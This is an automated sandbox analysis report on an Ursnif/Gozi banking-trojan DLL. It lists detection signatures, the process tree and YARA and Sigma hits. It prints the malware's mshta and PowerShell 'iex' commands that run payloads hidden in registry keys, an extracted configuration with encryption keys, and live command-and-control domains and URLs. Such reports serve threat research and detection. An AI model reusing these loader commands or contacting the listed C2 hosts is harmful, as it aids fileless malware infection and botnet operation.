Play interactive tour

Edit tour

Windows Analysis Report worVoBJYGD.dll

Overview

General Information

Sample Name:	worVoBJYGD.dll
Analysis ID:	458873
MD5:	2f3c83a9b7d37b99c603a28d09c74cc6
SHA1:	697235d82ea9218b2349cb1055276a1ebe96aefd
SHA256:	68ab9c658f136782ec8e341d0ad8257989689882cfc03db4cdf719b3a68c8e85
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Ursnif

Allocates memory in foreign processes

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5780 cmdline: loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 2512 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4604 cmdline: rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

control.exe (PID: 5912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 5892 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5432 cmdline: rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3752 cmdline: rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2832 cmdline: rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

control.exe (PID: 2224 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mshta.exe (PID: 68 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5708 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 1188 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5444 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 4988 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4696 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

mshta.exe (PID: 5644 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6052 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 3396 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5516 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=", "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "10", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 5780	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4604	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 2224	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 34 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 68, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5708

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 68, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5708

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline', ProcessId: 1188

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5912, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5892

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 68, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5708

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000000.00000002.497784812.0000000003120000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=", "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "10", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Multi AV Scanner detection for domain / URL

Show sources

Source: gtr.antoinfer.com	Virustotal: Detection: 12%			Perma Link
Source: app.flashgameo.at	Virustotal: Detection: 11%			Perma Link

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00D94CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

Source: worVoBJYGD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
